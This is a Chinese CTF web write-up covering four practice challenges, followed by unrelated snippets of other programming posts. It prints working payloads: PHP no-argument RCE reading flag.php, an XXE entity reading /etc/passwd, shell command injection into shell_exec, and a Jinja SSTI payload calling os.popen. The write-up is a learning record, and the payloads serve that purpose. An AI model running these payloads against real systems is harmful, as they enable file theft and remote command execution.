当前位置：首页 > news >正文

NSSCTF web 刷题记录1

news 2025/7/3 8:13:05

文章目录

前言
题目
- [GXYCTF 2019]禁止套娃
- - 方法一
  - 方法二
- [NCTF 2019]Fake XML cookbook
- [NSSRound#7 Team]ec_RCE
- [NCTF 2018]Flask PLUS

前言

今天是2023.9.3，大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少，新学期新气象。不可急于求成，稳扎稳打，把能利用的时间用来提升web实力。

题目

[GXYCTF 2019]禁止套娃

打开题目，直接扫一下目录
发现是存在git泄露—参考文章

在这里插入图片描述然后使用专门的工具Githack（下载地址）
打开终端，运行python（运行后要访问,/.git/才能有结果）

在这里插入图片描述源代码

<?php
include "flag.php";
echo "flag在哪里呢？<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");}}else{die("再好好想想！");}}else{die("还想读flag，臭弟弟！");}
}
// highlight_file(__FILE__);
?>

分析一下
第一个if语句禁用了一些php伪协议
第二个if语句很明显是无参rce的标志，一般代码为

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    eval($_GET['code']);
}

第三个if语句是禁用我们要rce的一些函数，比如phpinfo()等

所以rce的关键是无参

方法一

使用session_start()+session_id()读取文件（php<7）

payload

?exp=show_source(session_id(session_start())); 
Cookie: PHPSESSID=flag.php

得到flag

在这里插入图片描述

方法二

php函数直接读取文件

先读取数组，查看flag在第几个
payload

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
发现是第三个，那么我们可以先倒序再读取第二个

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

即可得到flag

[NCTF 2019]Fake XML cookbook

打开题目，根据提示应该不是sql注入
随便输入然后bp抓包，发现是xml格式的登录

在这里插入图片描述联想到XML中存在的XXE漏洞
payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>1</password></user>

在这里插入图片描述修改下命令，直接得到flag

在这里插入图片描述

[NSSRound#7 Team]ec_RCE

源代码

 <!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHPif(!isset($_POST["action"]) && !isset($_POST["data"]))show_source(__FILE__);putenv('LANG=zh_TW.utf8'); $action = $_POST["action"];$data = "'".$_POST["data"]."'";$output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");echo $output;    
?>

分析一下，有两个POST参数可控，然后出现shell_exec()函数
它的作用：将字符串作为OS命令执行，需要输出执行结果，且输出全部的内容。
payload

action=||&data='cat /flag'
或者
action=;cat /flag&data=

得到flag

[NCTF 2018]Flask PLUS

打开题目，在url输入{{7*7}}
在这里插入图片描述发现存在ssti漏洞

payload

{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}

在这里插入图片描述
然后得到flag

NSSCTF web 刷题记录1

文章目录前言题目[GXYCTF 2019]禁止套娃方法一方法二 [NCTF 2019]Fake XML cookbook[NSSRound#7 Team]ec_RCE[NCTF 2018]Flask PLUS 前言今天是2023.9.3，大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少，新学期新气象。不可急于求成&am…...

编程日记 2023/9/6 6:48:49

遥感指数数据库

目前遥感指数多种多样，那怎么针对不同的应用领域选择合适的植被指数？不同卫星又有哪些可以反演的指数？ Henrich等人开发了Index Database(网址：https://www.indexdatabase.de/)，总结了目前主流的遥感指数，…...

编程日记 2023/9/6 6:47:43

如何让insert程序速度快，可以试试联合SQL（insert 和 select 一起使用）？

查询添加可选择SQL执行，速度远超程序执行 insert 和 select案例 insert into 表1(列1,列2,列3,...) select 列1,列2,列3,...from表2(GROUP BY 列)116511 条数据耗时45秒， 如果是程序查询然后再insert，则需要30分钟左右！&#x…...

编程日记 2023/9/6 6:46:40

IP地址、网关、网络/主机号、子网掩码关系

一、IP地址 IP地址组成 IP地址分为两个部分：网络号和主机号 （1）网络号:标识网段，保证相互连接的两个网段具有不同的标识。 （2）主机号:标识主机，同一网段内，主机之间具有相同的网…...

编程日记 2023/9/6 6:45:39

使用skvideo.io.vread读取avi视频，报错“No way to determine width or height from video...”

问题描述： 一开始安装sk-video，在使用skvideo.io.vread读取avi视频，报错“No way to determine width or height from video. Need -s in inputdict. Consult documentation on I/O.” 解决方案： 1. 卸载sk-video pip uninsta…...

编程日记 2023/9/6 6:44:38

Nomad 系列-安装

系列文章 Nomad 系列文章 Nomad 简介开新坑！近期算是把自己的家庭实验室环境初步搞好了，终于可以开始进入正题研究了。首先开始的是 HashiCorp Nomad 系列，欢迎阅读。关于 Nomad 的简介，之前在大规模 IoT 边缘容器集群管…...

编程日记 2023/9/6 6:43:37

网络版五子棋C++实现

目录 1.项目介绍 2.开发环境 3.核心技术 4.环境搭建 5.WebSocketpp介绍 5.1WebSocketpp是什么 5.2为什么使用WebSocketpp 5.3原理解析： 5.4WebSocketpp主要特性 6.WebSocketpp使用 7.JsonCpp使用 8.MySQL API 9.项目模块设计以及流程图 10.封装日志宏…...

编程日记 2023/9/6 6:42:36

项目招标投标公众号小程序开源版开发

项目招标投标公众号小程序开源版开发以下是一个招标投标公众号小程序的功能列表： 用户注册与登录：用户可以注册账号并登录公众号小程序。项目发布：用户可以发布招标项目的详细信息，包括项目名称、招标单位、项目描述、招标要求…...

编程日记 2023/9/6 6:41:33

华为OD机试-机器人走迷宫

题目描述机器人走一个迷宫,给出迷宫的x和y(x*y的迷宫)并且迷宫中有障碍物,输入k表示障碍物有k个,并且会将障碍物的坐标挨个输入. 机器人从0,0的位置走到x,y的位置并且只能向x,y增加的方向走,不能回退. 如代码类注释展示的样子,#表示可以走的方格,0代表障碍,机器人从0,0的位置…...

编程日记 2023/9/6 6:40:33

Jenkins搭建步骤Linux环境

1、进入目标目录开始准备环境安装jdk 安装maven 安装tomcat 安装node 下载Jenkins.war并且拷贝进tomcat的webapp的文件夹下。环境变量配置如下自行更改： #--------------For JDK---------------- export JAVA_HOME/usr/local/java/jdk1.8.0_192 export PATH/usr…...

编程日记 2023/9/6 6:39:32

2023 AZ900备考

文章目录如何学习最近准备考AZ900考试，找了一圈文档，结果发现看那么多文档，不如直接看官方的教程https://learn.microsoft.com/zh-cn/certifications/exams/az-900/ ，简单直接，突然想到纳瓦尔宝典中提到多花时间进行思…...

编程日记 2023/9/6 6:38:31

青翼科技基于VITA57.1的16路数据收发处理平台产品手册

FMC211是一款基于VITA57.1标准规范的实现16路LVDS数据采集、1路光纤数据收发处理FMC子卡模块。该板卡支持2路CVBS（复合视频）视频输入，能够自动检测标准的模拟基带电视信号，并将其转变为8位ITU-R.656接口信号或者4:2:2分量视频信…...

编程日记 2023/9/6 6:37:28

Ansible_自动化运维实战(一)

1.DELL的一款服务器的价格、型号、配置（CPU，内存、硬盘、支持的RAID功能） DELL 服务器的定价、型号和配置因型号而异，可以通过访问 DELL 官方网站或联系 DELL 客户服务获取具体信息。一种示例是 DELL PowerEdge R740，其…...

编程日记 2023/9/6 6:36:27

说说Flink中的State

分析&回答基本类型划分在Flink中，按照基本类型，对State做了以下两类的划分： Keyed State，和Key有关的状态类型，它只能被基于KeyedStream之上的操作，方法所使用。我们可以从逻辑上理解这种状态是一…...

编程日记 2023/9/6 6:35:26

适合心理法律在线咨询预约含视频图文电话咨询功能的小程序开发

目前智能手机普及，很多以前需要线下咨询的场景都被搬到了线上，这样既可以使咨询者更方便，也可以使被咨询者接待效率更高，服务更多咨询者。基于此我们开发了专门的一款具有线上咨询功能的小程序，同时为了方便被咨询者服…...

编程日记 2023/9/6 6:34:23

Redis-Cluster集群操作--添加节点、删除节点

一、环境部署部署好Redis-Cluster集群，参考上个本人的博客：Redis-Cluster集群的部署（详细步骤）_是胡也是福的博客-CSDN博客新准备一台机器，修改主机名，关闭防火墙和selinux，参考&#xff1a…...

编程日记 2023/9/6 6:33:20

ModaHub魔搭社区：星环科技向量数据库Hippo社区版来啦

大语言模型正在与企业应用迅速结合，并深刻改变企业的各个产业环节。而大模型训练所使用的数据包含了如文档、图片、音视频等各种类型的非结构化数据，传统关系型数据库能力有限。通过将这些非结构化数据转换为多维向量，可以结构化地在向量数据库中进行管理，实现高效的数据存…...

编程日记 2023/9/6 6:32:19

gitHub添加ssh

gitHub添加ssh 首先你需要有一个github的账户第一步： 打开终端，输入以下命令，注意“your email”处你自己的邮箱，创建新的ssh ssh-keygen -t ed25519 -C “your email” 第二步：使用ssh登录ssh-agent，终端…...

编程日记 2023/9/6 6:31:18

sql：SQL优化知识点记录（十）

（1）慢查询日志 Group by的优化跟Order by趋同，只是多了一个having 开启慢查询日志： 演示一下慢sql：4秒之后才会出结果查看一下：下方显示慢查询的sql （2）批量插入数据脚本函数和存…...

编程日记 2023/9/6 6:30:16

STM32 RTC实验

RTC时钟简介 STM32F103的实时时钟（RTC）是一个独立的定时器。 STM32的RTC模块拥有一组连续计数的计数器，在相对应的软件配置下，可提供时钟日历的功能。修改计数器的值可以重新设置系统的当前时间和日期。 RTC模块和时钟配置系统…...

编程日记 2023/9/6 6:29:15

ssc377d修改flash分区大小

1、flash的分区默认分配16M、 / # df -h Filesystem Size Used Available Use% Mounted on /dev/root 1.9M 1.9M 0 100% / /dev/mtdblock4 3.0M...

编程新知 2025/6/18 5:34:10

微信小程序 - 手机震动

一、界面 <button type"primary" bindtap"shortVibrate">短震动</button> <button type"primary" bindtap"longVibrate">长震动</button> 二、js逻辑代码注：文档 https://developers.weixin.qq…...

编程新知 2025/7/3 3:03:08

oracle与MySQL数据库之间数据同步的技术要点

Oracle与MySQL数据库之间的数据同步是一个涉及多个技术要点的复杂任务。由于Oracle和MySQL的架构差异，它们的数据同步要求既要保持数据的准确性和一致性，又要处理好性能问题。以下是一些主要的技术要点： 数据结构差异数据类型差异&#xff…...

编程新知 2025/7/1 5:03:52

css的定位（position）详解：相对定位绝对定位固定定位

在 CSS 中，元素的定位通过 position 属性控制，共有 5 种定位模式：static（静态定位）、relative（相对定位）、absolute（绝对定位）、fixed（固定定位）和…...

编程新知 2025/6/20 15:30:35

C++.OpenGL （10/64）基础光照（Basic Lighting）

基础光照（Basic Lighting）冯氏光照模型（Phong Lighting Model） #mermaid-svg-GLdskXwWINxNGHso {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-GLdskXwWINxNGHso .error-icon{fill:#552222;}#mermaid-svg-GLd…...

编程新知 2025/6/25 15:26:59

稳定币的深度剖析与展望

一、引言在当今数字化浪潮席卷全球的时代，加密货币作为一种新兴的金融现象，正以前所未有的速度改变着我们对传统货币和金融体系的认知。然而，加密货币市场的高度波动性却成为了其广泛应用和普及的一大障碍。在这样的背景下，稳定…...

编程新知 2025/6/20 12:51:17

人工智能（大型语言模型 LLMs）对不同学科的影响以及由此产生的新学习方式

今天是关于AI如何在教学中增强学生的学习体验，我把重要信息标红了。人文学科的价值被低估了 ⬇️ 转型与必要性人工智能正在深刻地改变教育，这并非炒作，而是已经发生的巨大变革。教育机构和教育者不能忽视它，试图简单地禁止学生使…...

编程新知 2025/6/28 13:43:55

Netty从入门到进阶（二）

二、Netty入门 1. 概述 1.1 Netty是什么 Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty是一个异步的、基于事件驱动的网络应用框架，用于…...

编程新知 2025/7/1 3:39:26